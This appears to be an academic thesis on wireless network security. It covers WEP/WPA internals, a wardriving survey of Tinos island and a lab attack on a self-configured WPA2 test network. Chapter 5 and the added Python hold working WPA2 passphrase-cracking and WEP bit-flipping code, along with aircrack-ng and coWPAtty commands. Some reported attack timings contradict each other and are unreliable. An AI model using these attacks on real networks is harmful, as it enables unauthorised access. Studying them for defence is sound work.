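    if not info["to_ds"] and not info["from_ds"]:
        return {"DA": info["addr1"], "SA": info["addr2"], "BSSID": info["addr3"]}
    if info["from_ds"] and not info["to_ds"]:
        return {"DA": info["addr1"], "BSSID": info["addr2"], "SA": info["addr3"]}
    if info["to_ds"] and not info["from_ds"]:
        return {"BSSID": info["addr1"], "SA": info["addr2"], "DA": info["addr3"]}
    return {"RA": info["addr1"], "TA": info["addr2"], "DA": info["addr3"], "SA": info["addr4"]}


def parse_frame(frame):
    """Parse FC, Duration/ID, the address fields and Sequence Control, then verify the FCS.
    The FCS is CRC-32 over header and body, transmitted least significant byte first."""
    fc, duration = struct.unpack_from("<HH", frame, 0)
    info = parse_frame_control(fc)
    info["duration_id"] = duration
    info["addr1"], info["addr2"], info["addr3"] = (mac_str(frame[o:o + 6]) for o in (4, 10, 16))
    seq_ctrl, = struct.unpack_from("<H", frame, 22)
    info["fragment_number"] = seq_ctrl & 0xF
    info["sequence_number"] = seq_ctrl >> 4
    hdr_len = 24
    if info["type"] == 2 and info["to_ds"] and info["from_ds"]:
        info["addr4"] = mac_str(frame[24:30])   # Address 4 only exists in WDS data frames
        hdr_len = 30
    info["body"] = frame[hdr_len:-4]
    received_fcs, = struct.unpack_from("<I", frame, len(frame) - 4)
    info["fcs_ok"] = zlib.crc32(frame[:-4]) == received_fcs
    names = {0: MGMT_SUBTYPES, 1: CTRL_SUBTYPES}.get(info["type"], {})
    info["name"] = names.get(info["subtype"], TYPE_NAMES.get(info["type"], "reserved"))
    info["roles"] = address_roles(info)
    return info


def build_frame(fc, duration, addr1, addr2, addr3, seq, frag, body):
    """Assemble a 24-byte-header frame and append a correct FCS (used to build the samples)."""
    hdr = struct.pack("<HH", fc, duration) + addr1 + addr2 + addr3 + struct.pack("<H", (seq << 4) | frag)
    return hdr + body + struct.pack("<I", zlib.crc32(hdr + body))


# Constructed sample frames (not captured traffic); locally administered MAC addresses.
STA = bytes.fromhex("021122334455")
AP = bytes.fromhex("02aabbccddee")
# Management frame, subtype 12 (deauthentication); body = reason code 7, little-endian.
DEAUTH = build_frame(0x00C0, 0x013A, STA, AP, AP, seq=1, frag=0, body=b"\x07\x00")
# Data frame leaving the DS with the Protected Frame bit set; body = CCMP header + ciphertext.
PROTECTED_DATA = build_frame(0x4208, 0x002C, STA, AP, bytes.fromhex("020000000001"), seq=42, frag=0,
                             body=bytes.fromhex("0100002000000000") + b"\xde\xad\xbe\xef")

if __name__ == "__main__":
    for f in (DEAUTH, PROTECTED_DATA):
        p = parse_frame(f)
        print(p["name"], p["roles"], "protected" if p["protected"] else "clear",
              "FCS ok" if p["fcs_ok"] else "FCS bad")
```

Note what the parser cannot tell: the deauthentication frame carries a valid FCS and plausible addresses whether it came from the access point or from an attacker, since nothing in the header is authenticated; only the Protected Frame bit of the data frame indicates that the body is cryptographically protected.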
CHAPTER 3: SECURITY IN WIRELESS NETWORKS
The advantages of wireless networks are numerous, but the data moving through the network is
transmitted over radio frequencies, which anyone within range can receive and transmit on. This
immediately created the need for network security. Confidentiality, integrity, authentication and
availability of the exchanged information are now provided by encryption protocols that were built on
already known cryptographic methods, and thus inherit whatever weaknesses and strengths exist in
other implementations of modern cryptography.
Source: msdn.microsoft.com
The encryption and decryption of a message is done using an algorithm and an encryption key. The
algorithm is usually public, so the confidentiality of the transmitted message rests almost entirely on
the secrecy of the key.
Image 12- Standard WEP Encryption Process using RC4 algorithm with XOR operation
Source: resources.infosecinstitute.com
WEP is a symmetric scheme built on the RC4 stream cipher with a 64- or 128-bit per-packet key. The
per-packet key is formed by concatenating a 24-bit Initialization Vector (IV), sent in the clear with every
frame, with the pre-shared key entered by the user, which is 40 or 104 bits long. RC4 expands this key
into a pseudo-random keystream, which is XORed with the plaintext to produce the ciphertext; the
receiver regenerates the same keystream from the IV and the shared key and XORs it back.
Integrity is checked by an Integrity Check Value (ICV) appended to the plaintext before encryption. The
ICV is a CRC-32 checksum: it detects transmission errors but does not correct them, and because CRC is a
linear function it offers no protection against deliberate modification of the ciphertext.
Source: www.tp-link.us
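The following Python code is an added illustration of the process in Image 12, not code from the thesis or from any WEP implementation. RC4 is implemented inline, the key index byte is assumed to be 0, and the key, IV and plaintexts are constructed. Besides encryption and decryption it shows two consequences of the design just described: reuse of an IV exposes the keystream, and the linearity of CRC-32 lets an attacker modify encrypted data while keeping the ICV valid.

```python
import struct
import zlib


def rc4_keystream(key, length):
    """RC4 key scheduling followed by the PRGA; returns `length` bytes of keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(shared_key, iv, plaintext):
    """WEP-40/104: per-packet RC4 key = IV (3 bytes) || shared key (5 or 13 bytes).
    The ICV (CRC-32 of the plaintext) is appended and encrypted together with the data.
    Returns IV || key-index byte (assumed 0) || RC4(plaintext || ICV)."""
    assert len(iv) == 3 and len(shared_key) in (5, 13)
    icv = struct.pack("<I", zlib.crc32(plaintext))
    keystream = rc4_keystream(iv + shared_key, len(plaintext) + 4)
    return iv + b"\x00" + xor(plaintext + icv, keystream)


def wep_decrypt(shared_key, packet):
    """Returns (plaintext, icv_ok). The IV is read from the packet itself."""
    iv, body = packet[:3], packet[4:]
    data = xor(body, rc4_keystream(iv + shared_key, len(body)))
    plaintext, icv = data[:-4], data[-4:]
    return plaintext, struct.pack("<I", zlib.crc32(plaintext)) == icv


def decrypt_via_iv_reuse(known_packet, known_plaintext, target_packet):
    """Weakness 1: with only 2^24 IVs an IV is soon reused, and the same IV + key gives the same
    keystream. Knowing the full plaintext of one frame (hence its ICV too) yields the keystream,
    which decrypts the other frame without the key."""
    assert known_packet[:3] == target_packet[:3], "needs two frames with the same IV"
    assert len(target_packet) <= len(known_packet)
    known_icv = struct.pack("<I", zlib.crc32(known_plaintext))
    keystream = xor(known_packet[4:], known_plaintext + known_icv)
    return xor(target_packet[4:], keystream)[:-4]


def flip_bits_keeping_icv(packet, offset, mask):
    """Weakness 2: CRC-32 is linear, crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros). XORing a delta into
    the ciphertext and the matching CRC delta into the encrypted ICV keeps the ICV valid, so the
    receiver accepts a modified frame it cannot distinguish from the original."""
    body = bytearray(packet[4:])
    delta = bytearray(len(body) - 4)
    delta[offset] ^= mask
    icv_delta = zlib.crc32(bytes(delta)) ^ zlib.crc32(bytes(len(delta)))
    body[offset] ^= mask
    for k, b in enumerate(struct.pack("<I", icv_delta)):
        body[len(delta) + k] ^= b
    return packet[:4] + bytes(body)


# Constructed sample values (not captured traffic): a 13-byte WEP-104 key and one IV.
SHARED_KEY = b"wepkey104bits"
IV = b"\x01\x02\x03"

if __name__ == "__main__":
    pkt = wep_encrypt(SHARED_KEY, IV, b"GET / HTTP/1.1")
    print(wep_decrypt(SHARED_KEY, pkt))
    print(wep_decrypt(SHARED_KEY, flip_bits_keeping_icv(pkt, 0, ord("G") ^ ord("P"))))
```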
WPA-Enterprise. This mode provides the security needed for wireless networks in business
environments. It is more complicated to set up, but it offers individualized and centralized control
over access to the Wi-Fi network. When users try to connect to the network, they must present
their own login credentials.
Image 14 - WPA- Enterprise mode
Source: www.tp-link.us
This mode uses 802.1X authentication against a RADIUS server and is appropriate where
a RADIUS server is deployed. WPA-Enterprise can only be used when a RADIUS server is
available for client authentication.
WPA kept RC4 to ensure compatibility with existing wireless networking products. In
addition, WPA introduced the Temporal Key Integrity Protocol (TKIP), which renews the keys
dynamically during the connection. To avoid reusing the same RC4 key, the per-packet key is mixed from
the temporal key, the transmitter's MAC address and a 48-bit packet sequence counter, so every frame is
encrypted with a different key and the counter also serves as a replay check.
The initialization vector is derived from the sequence counter and the mixed key, and a fresh keystream is
generated for every packet. To enhance the integrity of the frames, a Message Integrity Check (MIC)
was added. The MIC value is calculated by the "Michael" algorithm and covers the payload together with the
sender and receiver addresses. A further feature is a countermeasure mechanism that detects attempts to
forge frames: if two MIC failures occur within 60 seconds, the keys are discarded and communication is
suspended for a minute.
The WPA-Personal (WPA-PSK) mode is designed for small office and home use. With this method the
station authenticates to the access point by proving knowledge of a passphrase of 8 to 63 ASCII
characters. The passphrase is not used directly: the PBKDF2 function (4096 iterations of HMAC-SHA1,
with the SSID as salt) reduces it to a 256-bit Pairwise Master Key (PMK), which is the pre-shared key
both sides hold.
Subsequently the access point and the station derive from the PMK a temporary session key (the Pairwise
Transient Key, PTK) in the four-way handshake, and this key is renewed at regular intervals.
WPA and WEP encryption both use the RC4 algorithm. However, WEP uses a 24-bit initialization
vector and a 40- or 104-bit key, whereas WPA uses a 48-bit initialization vector and a 128-bit
encryption key.
WEP is insufficient for security, because attacks target the initialization vector and the modification of
packets. WPA has minimized such attacks through the combination of TKIP, the MIC and the
longer initialization vector.
The 48-bit sequence counter gives about 2.8 x 10^14 (2^48) per-packet keys before a value would repeat,
so within the lifetime of a temporal key no per-packet key is reused; this is what protects TKIP against
the key recovery attacks that break WEP. The MIC, in turn, protects against forged or tampered packets
(not against eavesdropping, which is the task of the encryption).
WPA-Enterprise and WPA-PSK provide a much stronger security mechanism than WEP. In WEP, user
authentication consisted only of sharing a common key. In WPA, authentication and encryption are
separate functions: authentication is done against the 802.1X server with credentials, and the keys are
distributed automatically.
With the introduction of WPA2, the RC4 algorithm was replaced by AES in CCMP (Counter Mode with
CBC-MAC Protocol). Like TKIP, CCMP uses a 48-bit packet number, but instead of per-packet key
mixing it uses the AES key directly, in CCM mode, to protect both the confidentiality and the integrity of
the packet.
The 48-bit packet number and the 128-bit encryption key minimize the vulnerability of the system to
replay attacks. The enhanced protection provided by CCMP in comparison with TKIP requires more
processing power, and often needs new or upgraded hardware.
3.3. Types of Attacks on wireless networks
Wireless networks are susceptible to attack because of their transmission medium. These attacks are
carried out for different purposes; for example, an attacker may simply want to monitor the traffic, or
want to gain access to the network.
Attacks on wireless networks can be classified into two broad categories, passive and active attacks.
The term «Wardriving» describes the practice in which a user drives or walks through the streets of
a neighbourhood carrying a device with wireless access, in order to detect wireless networks and map
their existence, for statistical or other reasons.
It took its name from a common practice of the 1980s known as «Wardialing», in which the "perpetrators"
dialled ranges of telephone numbers in order to locate dial-up modems, and then attempted to use these
modems for illegal access to telephone networks and, later, to the Internet.
Wardriving was first reported in the US in 2000, in a survey of wireless networks in the city of Berkeley,
California. This research aimed to show the security gaps of the wireless networks that were growing
rapidly in Berkeley, and that the wireless technology had to be improved in terms of information security.
The survey showed that access to a wireless network is possible with simple tools, even at a long
distance from where the wireless transmitter is mounted.
Wardriving does not require expensive or hard-to-find equipment. It can be done with either a
laptop computer or a smartphone.
4.2. Wardriving Equipment
There are many tools for this type of survey. In our project we used a smartphone and the Android
application WiGLE.
Image 17 - Vodafone Smart 4 Review Image 18– WigleWifiWardriving Application at Google Play Store
Specifically, the equipment we used is:
1. A smartphone, Vodafone Smart 4 with Android version 4.4.2.
2. The Android application WiGLE Wifi Wardriving, version 2.7 (free).
3. A GPS receiver, provided by the smartphone.
4. Microsoft Excel 2010, needed for data analysis.
Source: andronexus.store.aptoide.com
WiGLE was started in 2001. Some of the features of the current version are:
Export to CSV files on SD card (comma separated values).
Export to KML files on SD card (to import into Google Maps/Earth).
Local database to track new networks found
Real-time map of networks found (Open Street Map)
Bluetooth GPS support through mock locations
Can move app to SD card
Source: andronexus.store.aptoide.com
Image 21 - Wireless Networks in and around central town of Tinos Greek Island – Google Earth view
Image 22 - Wardriving followed paths in and around central town of Tinos Greek Island – Google Earth view
4.3.1. Preparation process for analysis of data
For the CSV analysis we used Microsoft Excel 2013. To read the exported .CSV file we made the
following steps:
After completing the text import wizard, we arranged the data of the CSV file in columns
as in the following figure.
Step 3. Clean the data
4.4. Security analysis of wireless networks in and around central town of Tinos Greek
Island-Results
Analysing the CSV data we observed that 1,396 of the 1,416 wireless networks recorded use WPA or WPA2
encryption, only 1.4% use the completely insecure WEP, and none were open (no encryption at all).
Table 1 displays the distribution of security protocols, while Graph 1 shows the same distribution as
percentages.
Security        Networks      %
WEP                   20    1.4
WPA or WPA2         1396   98.6
No protection          0    0.0
Total               1416  100.0
Table 1. Wireless networks in and around central town of Tinos Greek island – Security Analysis of data
Graph 1. Wireless networks in and around central town of Tinos Greek island – Security Analysis of data
These results reflect the following fact. In recent years all providers and manufacturers of wireless
devices ship them with WPA/WPA2 preconfigured: each device leaves the factory with the protocol
enabled and a different, individual default passphrase. So it is very easy for someone to have an encrypted
wireless network without any particular knowledge. Whether such a default key is actually strong depends
on how the manufacturer generates it: a passphrase derived predictably from the SSID or the MAC address,
both of which are broadcast, offers far less than the 256-bit key size suggests.
4.5. Channel analysis of wireless networks in and around central town of Tinos Greek
Island-Results
Wireless networks in the 2.4 GHz band use 13 channels (in Europe), each 22 MHz wide but spaced only
5 MHz apart, so adjacent channels overlap and only three of them (1, 6 and 11) can be used at the same
time without overlapping.
The channel analysis shows that the vast majority of networks use exactly these three channels, 1, 6 and 11,
while the others remain largely unused. This concentration is the intended configuration rather than a
fault; the networks on the intermediate channels (2-5, 7-10, 12-13) overlap with both neighbouring
non-overlapping channels and interfere with them. In a dense area, however, many networks sharing
the same channel contend for the same air time, so efficiency declines and errors and retransmissions
increase.
Channel   Networks      %
1              433   30.6
2               60   4.23
3               27   1.91
4               32   2.26
5               19   1.34
6              300  21.19
7               35   2.47
8               27   1.91
9              114   8.05
10              36   2.54
11             281  19.83
12              15   1.06
13              37   2.61
Total         1416    100
Table 2. Wireless networks in and around central town of Tinos Greek island – Channel Analysis of data
Graph 2. Wireless networks in and around central town of Tinos Greek island – Channel Analysis of data
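As an added example (not part of the thesis' analysis, which was done in Excel), the following Python script performs the same classification on a WiGLE export without a spreadsheet. The CSV rows are constructed and the layout follows the WiGLE WiFi Wardriving CSV export as assumed here (a one-line preamble followed by the column header); the sample reuses the BSSID and SSID of the test network of Chapter 5 and adds invented entries. It de-duplicates by BSSID, tallies the security classes of Table 1 and the channels of Table 2, reports how many networks each channel overlaps with in frequency, and lists the WEP and open networks a security review would follow up on.

```python
import csv
import io
from collections import Counter

# Constructed sample in the layout of the WiGLE WiFi Wardriving CSV export (assumption: one
# preamble line, then the column header). The rows are invented, not the thesis' survey data.
SAMPLE_CSV = """WigleWifi-1.4,appRelease=2.7,model=Vodafone Smart 4,release=4.4.2
MAC,SSID,AuthMode,FirstSeen,Channel,RSSI,CurrentLatitude,CurrentLongitude,AltitudeMeters,AccuracyMeters,Type
4c:ed:de:1e:96:8e,Wind_Wi_Fi,[WPA2-PSK-CCMP][ESS],2016-02-20 10:01:05,1,-61,37.5387,25.1629,12.0,8.0,WIFI
02:11:22:33:44:01,OTE_A1,[WPA-PSK-TKIP][WPA2-PSK-CCMP][ESS],2016-02-20 10:01:07,6,-72,37.5388,25.1630,12.0,8.0,WIFI
02:11:22:33:44:02,linksys,[WEP][ESS],2016-02-20 10:01:09,11,-80,37.5389,25.1631,12.0,8.0,WIFI
02:11:22:33:44:03,FreeCafe,[ESS],2016-02-20 10:02:30,3,-66,37.5390,25.1632,12.0,8.0,WIFI
4c:ed:de:1e:96:8e,Wind_Wi_Fi,[WPA2-PSK-CCMP][ESS],2016-02-20 10:05:11,1,-58,37.5391,25.1633,12.0,8.0,WIFI
02:11:22:33:44:04,Hotel_Guest,[WPA2-EAP-CCMP][ESS],2016-02-20 10:06:00,11,-70,37.5392,25.1634,12.0,8.0,WIFI
"""


def load_networks(text):
    """Parse the export, skip the preamble line and de-duplicate by BSSID: a network seen from
    several positions appears once per sighting, but must be counted once."""
    lines = text.splitlines()
    reader = csv.DictReader(io.StringIO("\n".join(lines[1:])))
    networks = {}
    for row in reader:
        if row.get("Type", "WIFI") == "WIFI":
            networks.setdefault(row["MAC"].lower(), row)
    return list(networks.values())


def security_class(auth_mode):
    """Collapse the AuthMode capability string into the three classes of Table 1
    (WPA and WPA2 are lumped together, as in the thesis)."""
    if "WPA" in auth_mode:
        return "WPA or WPA2"
    if "WEP" in auth_mode:
        return "WEP"
    return "No protection"


def security_table(networks):
    """Counts and percentages per security class, in the order of Table 1."""
    counts = Counter(security_class(n["AuthMode"]) for n in networks)
    total = len(networks)
    return {k: (counts[k], round(100.0 * counts[k] / total, 1))
            for k in ("WEP", "WPA or WPA2", "No protection")}


def channel_table(networks):
    """Per-channel counts plus, per channel, how many networks on other channels overlap it.
    2.4 GHz channels are 5 MHz apart and 22 MHz wide, so channels fewer than 5 steps apart overlap."""
    counts = Counter(int(n["Channel"]) for n in networks)
    overlap = {ch: sum(c for other, c in counts.items() if other != ch and abs(other - ch) < 5)
               for ch in counts}
    return counts, overlap


def weak_networks(networks):
    """The rows a security review would pull out: WEP and open networks, with BSSID and SSID."""
    return [(n["MAC"], n["SSID"], n["AuthMode"]) for n in networks
            if security_class(n["AuthMode"]) != "WPA or WPA2"]


if __name__ == "__main__":
    nets = load_networks(SAMPLE_CSV)
    print(security_table(nets))
    print(channel_table(nets))
    print(weak_networks(nets))
```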
EMPIRICAL PART 2
CHAPTER 5: CRACKING SECURITY IN WIRELESS NETWORKS
In the previous chapter we saw one of the most common ways of analysing the protection protocols
used by the wireless networks of a particular research area. As already noted, the WPA and WPA2
protocols are by far the most widespread in the study area, because of the predefined procedure by
which the router manufacturer configures the protection of the wireless network.
Building on that research, and knowing that WPA2 is one of the most widely used security protocols, we
carry out a series of attacks to recover the pre-shared key of a test device, using the Kali Linux
distribution.
Source: en.wikipedia.org
Linux can be installed and runs on a wide variety of computer systems, from small devices such as mobile
phones to large systems and supercomputers.
A Linux distribution bundles the kernel with the accompanying programs, such as libraries, system tools,
a windowing system and the many other applications required for the proper functioning of a computer.
A characteristic of distributions is the great scope for configuration they offer, as each one is
addressed to a different kind of user.
Image 28 - Kali Linux logo
Source: www.offensive-security.com
Kali Linux can run installed on a computer's hard disk, booted from a live CD or live USB,
or within a virtual machine. It is a supported platform of the Metasploit Project's Metasploit
Framework, a tool for developing and executing security exploits.
Kali Linux tools are classified into the following categories:
INFORMATION GATHERING
VULNERABILITY ANALYSIS
WIRELESS ATTACKS
WEB APPLICATIONS
REPORTING TOOLS
HARDWARE HACKING
REVERSE ENGINEERING
MAINTAINING ACCESS
PASSWORD ATTACKS
SNIFFING & SPOOFING
STRESS TESTING
FORENSICS TOOLS
EXPLOITATION TOOLS
For this type of attack we need specific tools: a wireless network card that supports monitor mode, the
Kali Linux distribution, and a target wireless network that uses WPA/WPA2 encryption.
In particular, for the attack we used:
Laptops
We used two laptops to simulate the attack.
Source: www.cnet.com
The first one is a Samsung R530. The attacks were carried out using the integrated wireless
network card of this laptop.
Source: driverbasket.com
The second laptop was the target of the attacks. It is an HP Compaq 610q. It features an integrated wireless
network card that supports the IEEE 802.11b, 802.11g and 802.11n standards and the WEP/WPA/WPA2
encryption methods.
Source: websec.ca
For the attacks, the target network was configured with WPA2, SSID «Wind_Wi_Fi» and passphrase
«tinosemagazine11».
5.4.1. Dictionary attack
A dictionary attack is a method of cracking a wireless network's passphrase by trying every entry of a
word list. It is efficient and fast because many users insist on choosing common passwords.
Such dictionaries typically contain common words, names and leaked passwords of eight characters or
more (the WPA minimum), often with the usual variations. A passphrase that appears in the dictionary is
found regardless of its length; dictionary attacks rarely succeed against long multi-word passphrases, and
fail against passphrases made of random combinations of upper and lower case letters, digits and symbols,
which can only be attacked by brute force.
The aircrack-ng suite includes:
airmon-ng
airodump-ng
aireplay-ng
aircrack-ng
airolib-ng
5.5.1. About Airmon-ng
First, to be able to carry out the attack we must put the network card of the attacking computer into
monitor mode, so that it receives all 802.11 frames on the channel rather than only those addressed to it.
This is done with "Airmon-ng".
Usage
airmon-ng {start|stop} {interface}
where
start|stop determines whether to activate or deactivate monitor mode on the wireless card, and
interface specifies the network card on which monitor mode is enabled or disabled (for example wlan0;
airmon-ng then creates a monitor interface such as wlan0mon).
After that we start capturing packets. For WEP this means collecting IVs; for WPA/WPA2 it means
capturing the four-way handshake between a client and the access point. For this purpose "Airodump-ng"
is used.
"Airodump-ng" captures packets from 802.11 networks and collects IVs (Initialization Vectors) and
handshakes. It is also used to identify the 802.11 networks within range of our card.
Usage
airodump-ng {interface}
where
interface specifies the (monitor mode) network card that will be used to record packets.
When clients are connected to an AP, the following client details are shown:
Under BSSID, the address of the AP to which the client is connected.
Under STATION, the MAC address of the client.
Under Packets, the number of packets that have been recorded for this client.
In order to capture the frames of the access point of interest more quickly, and to record the packets that
will be injected, we lock the capture to that access point and its channel:
Usage
airodump-ng --channel 1 --write Wind_Wi_Fi --bssid 4C:ED:DE:1E:96:8E wlan0mon
Image 34 - "Concept" of the handshake packet
5.5.3. Aircrack-ng
"Aircrack-ng" is the tool used to crack the key of an access point. It is the first of the four
attacks performed in this investigation, which aims to ascertain which of them is the
fastest and most effective. For WPA/WPA2, "aircrack-ng" needs the capture file containing the four-way
handshake (the IV log is only relevant for WEP) and a dictionary file; for every candidate passphrase it
derives the PMK and checks it against the MIC of the captured handshake.
Usage
aircrack-ng [options] {capture file(s)}
aircrack-ng Wind_Wi_Fi-01.cap -w d dictionary.txt
5.6. Airolib-ng & Aircrack-ng
The second attack is performed again with "Aircrack-ng", but in combination with "Airolib-ng" and
with a different method: pre-computed hashes.
"Airolib-ng" stores and manages lists of ESSIDs and passwords and computes their Pairwise
Master Keys (PMKs). It uses an SQLite3 database, which is available for many platforms and gives
good memory and disk space management. The PMKs, once computed in batch, can be reused in
future attacks, and aircrack-ng is then pointed at the database (option -r) instead of a word list.
5.7. coWPAtty
"Aircrack-ng" is a powerful tool, but it has some limitations. Another attack tool is
"coWPAtty", created by Joshua Wright; it can be combined with popular password
cracking tools such as «John the Ripper».
It is a dictionary attack tool which requires at least two frames of the four-way handshake to have
been captured.
"coWPAtty" is the tool we use as the second way of running a dictionary attack. We have to specify the
dictionary, the SSID of the network and the capture file.
Usage
cowpatty -s Wind_Wi_Fi -r Wind_Wi_Fi-01.cap -f dictionary.txt
5.8. genpmk & coWPAtty
The "genpmk" command is the tool used to create pre-computed hash files; it is coWPAtty's counterpart
to airolib-ng. Because the PMK is derived from the passphrase with the SSID as salt, the hashes depend on
the SSID of the access point: a different hash set is needed for each unique SSID.
Usage
genpmk -s Wind_Wi_Fi -d Wind_Wi_Fi.hash -f dictionary.txt
cowpatty -s Wind_Wi_Fi -r Wind_Wi_Fi-01.cap -d Wind_Wi_Fi.hash
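The following Python code is an added example, not code from the thesis or from aircrack-ng, coWPAtty or genpmk; it shows what the dictionary attack of section 5.4.1, the WPA-PSK key derivation of Chapter 3 and the pre-computed hash attacks of sections 5.6 and 5.8 actually compute. The handshake is constructed: the SSID, passphrase and BSSID are those of the test network above, but the station address, nonces and EAPOL message 2 are invented, and the MIC is computed from them with the real passphrase, as the supplicant would. Key derivation follows IEEE 802.11i for WPA2-PSK with CCMP (PBKDF2-HMAC-SHA1 with the SSID as salt, PRF-384 for the PTK, HMAC-SHA1 for the EAPOL MIC).

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes).
    This is the slow step; genpmk/airolib-ng precompute it once per (SSID, passphrase)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """IEEE 802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter) blocks."""
    out = b""
    for counter in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK for CCMP (384 bits): KCK (16) || KEK (16) || TK (16). Only public handshake values are
    mixed in, so anyone who captured them can derive the PTK from a candidate PMK."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


MIC_OFFSET = 81  # 4-byte EAPOL header + 77 bytes of EAPOL-Key fields precede the 16-byte MIC


def eapol_mic(kck, eapol_frame):
    """WPA2/AES key descriptor: MIC = first 16 bytes of HMAC-SHA1(KCK, frame with the MIC zeroed)."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def check_candidate(pmk, hs):
    """What aircrack-ng/coWPAtty do per word: derive the PTK, recompute the MIC of message 2, compare."""
    ptk = derive_ptk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
    return hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol2"]), hs["eapol2"][MIC_OFFSET:MIC_OFFSET + 16])


def dictionary_attack(words, hs):
    """Plain dictionary attack: PBKDF2 for every word (the 'aircrack-ng -w' / 'cowpatty -f' path)."""
    for word in words:
        if check_candidate(pmk_from_passphrase(word, hs["ssid"]), hs):
            return word
    return None


def precompute_pmks(words, ssid):
    """The genpmk / airolib-ng step: a table of PMKs that is valid only for this SSID."""
    return {word: pmk_from_passphrase(word, ssid) for word in words}


def precomputed_attack(table, hs):
    """The 'cowpatty -d' / 'aircrack-ng -r' path: only the cheap PTK + MIC check per word."""
    for word, pmk in table.items():
        if check_candidate(pmk, hs):
            return word
    return None


def make_sample_handshake(passphrase, ssid):
    """Builds a constructed handshake capture (message 2) as a dict. Not a real capture: the station
    address, nonces and replay counter are invented; the MIC is computed with the real passphrase."""
    hs = {"ssid": ssid, "ap_mac": bytes.fromhex("4cedde1e968e"), "sta_mac": bytes.fromhex("021122334455"),
          "anonce": bytes(range(32)), "snonce": bytes(range(100, 132))}
    # EAPOL-Key body: RSN descriptor (2), key info 0x010a (pairwise | MIC | HMAC-SHA1), key length 0,
    # replay counter 1, SNonce, key IV, RSC, key ID, zeroed MIC, key data length 0.
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x00" + (1).to_bytes(8, "big") + hs["snonce"]
            + bytes(16) + bytes(8) + bytes(8) + bytes(16) + b"\x00\x00")
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v1, type 3 (Key)
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), hs["ap_mac"], hs["sta_mac"],
                     hs["anonce"], hs["snonce"])[:16]
    hs["eapol2"] = frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]
    return hs


# Constructed sample: the SSID and passphrase of the test network above, plus a tiny word list.
SAMPLE = make_sample_handshake("tinosemagazine11", "Wind_Wi_Fi")
WORDLIST = ["password", "tinosmagazine", "12345678", "tinosemagazine11", "letmein1"]

if __name__ == "__main__":
    print("dictionary:", dictionary_attack(WORDLIST, SAMPLE))
    print("precomputed:", precomputed_attack(precompute_pmks(WORDLIST, "Wind_Wi_Fi"), SAMPLE))
```

The precomputed table is keyed by word, but each PMK is valid only for the SSID it was computed with: a table built for another SSID finds nothing even though it contains the right passphrase, which is why the hash sets of genpmk and airolib-ng have to be rebuilt for every SSID.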
Image 43 - Preparation with genpmk
Image 45 - Attack using pre-computed hashes
To attack the wireless network «Wind_Wi_Fi» we used a dictionary of 2,804,985 words, 26.9 MB in size.
The passphrase is located at line 1,121,984, so each program had to process about 40% of
the dictionary before finding the key. The following table shows the results of the attacks. The application
used for each attack is in the column Software, the column Time shows the duration of each attack in
seconds, the column keys/sec indicates the rate at which the dictionary was processed, and the column
Pre-calculated time (sec) shows the time the tools "airolib-ng" and "genpmk" took to create the hash files.
Comparing the attacks by duration, we observe that the longest was the "coWPAtty" dictionary attack
with 2,764.63 s, i.e. about 45 minutes, while the shortest was again "coWPAtty", this time combined with
"genpmk" (the pre-computed hash attack), at only 6.44 s.
[42]
Graph - Time (sec) of each attack, with the values as labelled on the chart: aircrack-ng (dictionary) 715; airolib-ng & aircrack-ng (pre-computed hashes) 17; coWPAtty (dictionary) 4346.01; genpmk & coWPAtty (pre-computed hashes) 7.
In particular, comparing the two dictionary attacks, "Aircrack-ng" completed its attack in 715 s, about 12 min, whereas "coWPAtty", as mentioned above, took approximately 45 min.
Graph - Pre-calculated time (sec) needed to create the hash files, airolib-ng & aircrack-ng versus genpmk & coWPAtty: the two bars read 11,516.0 s and 10,671.0 s.
Graph - Time (sec) of the two attacks with pre-computed hashes: airolib-ng & aircrack-ng 17 s; genpmk & coWPAtty 7 s.
In conclusion, "Aircrack-ng" is the better choice for the dictionary attack, while "genpmk" & "coWPAtty" is better for the attack with pre-computed hashes.
CONCLUSIONS
This thesis gave a general overview of some attacks that violate the security of wireless networks.
Wireless LANs, because of the advantages they offer, are widely accepted by consumers and are spreading rapidly. However, the main issue that concerns everyone involved in their development is security.
To improve the security of wireless networks, encryption protocols were introduced, but these also have weaknesses. The WEP protocol appeared first and revealed many security gaps; despite all the improvements made to it, WEP never qualified as a secure protocol. A new, more effective solution was proposed with the 802.11i standard: the WPA protocol and, in its final version, WPA2, which achieves even greater security. Developed to address and correct the deficiencies of WEP, WPA2 uses the CCMP encryption algorithm, which provides confidentiality, authentication, integrity and protection against replayed packets. It should be noted that the attacks demonstrated in chapter 5 do not break CCMP itself; they recover a weak pre-shared passphrase from the captured 4-way handshake, so the strength of a WPA2-PSK network rests on the passphrase that is chosen. Attacks on networks using WEP and WPA/WPA2 have been automated by applications such as the Aircrack-ng suite of tools, so anyone with a modern computer and an understanding of computer technology can carry them out. However, even an integrated security system becomes weak if one does not know how to use it.